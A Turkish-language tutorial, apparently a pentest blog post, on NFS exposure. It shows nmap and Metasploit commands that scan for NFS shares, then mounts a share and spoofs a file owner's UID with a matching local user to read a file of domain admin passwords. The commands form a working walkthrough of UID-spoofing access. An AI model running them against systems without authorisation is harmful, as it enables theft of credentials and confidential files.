NFS Tespiti ve Zafiyeti
Arkadaşlar bugün Nfs sisteminde bulunan çoğu zaman hackerlar tarafından krtik bilgilerin ele geçirildiği zafiyetten bahsedeceğim.
Kısaca NFS (Network File System) Nedir ?
- UNIX'in doğal dosya paylaşım sistemidir.
- Yerel bir ağda, birbirine bağlı Linux sistemlerin, aralarında dosya paylaşımını sağlayan bir teknolojidir.
- Üzerindeki dosya sisteminin tamamını veya bir bölümünü yerel ağ üzerindeki diğer makinelerin paylaşımına açar.
- 2049/TCP portunda çalışır.
NFS Zafiyeti Oluşumu
Network sızma testi yapılan firmaların bir çoğunda dosya paylaşımında bir çok veri elde edilir. Biz şimdi bu paylaşımın açık olduğunu düşündüğümüz bir sistemi tespit edelim.
Kullanılan Araçlar
- Nmap
- Metasploit
Nmap İle Network'te NFS Servisi Tespiti
nmap -n -PN -sS -T5 -p 2049 --script=nfs-showmount GATEWAY-ADRESİ/İP-BLOĞU
Metasploit ile Network'te NFS Servisi Tespiti
msf > use auxiliary/scanner/nfs/nfsmount
msf auxiliary(nfsmount) > set RHOSTS GATEWAY-ADRESİ/İP-BLOĞU
msf auxiliary(nfsmount) > run
msf auxiliary(nfsmount) > set RHOSTS GATEWAY-ADRESİ/İP-BLOĞU
msf auxiliary(nfsmount) > run
Tespit edilen paylaşımlar yerel sisteme nasıl bağlanır ?
#mount -t nfs 192.168.0.1:/export/home /home/user/Desktop/baglama_dizini
Evet paylaşımı yerel sistemde Masaüstüne bağladık. Şimdi terminalde paylaşımda bulunulan argümanları ve hangi UID değeri sahip bir kullanıcıya ait olduğunu görelim.
-rwxr----- 1923 1000 1898 domainAdminveSifreleri.doc
Paylaşıma açık olan klasörde kritik bilgilerin olduğu görüyoruz. Fakat bu doc dosyasını yetkili kullanıcı UID değerine sahip bir kullanıcı ile acmamız gerekebilir. Öncelikle mount ettiğimiz bağı unmount komutuyla çözelim. Daha sonra yerel sistemde aynı UID değere sahip olan bir kullanıcı acalım.
# umount /baglama_dizini
Evet bağımızı başarıyla çözdük. Şimdi aynı UID değere sahip kullanıcı acalım.
# useradd deneme
Kullanıcımızı açtık sıra geldi UID değerimizi vermeye.
# usermod -u 1923 deneme
UID değerimizi verdikten sonra tekrar paylaşımı yerel sisteme bağlayalım.
#mount -t nfs 192.168.0.1:/export/home /home/user/Desktop/baglama_dizini
Evet artık kritik bilgiye sahip domainAdminveSifreleri.doc adlı dosyamızı başarılı bir şekilde okuyabiliriz.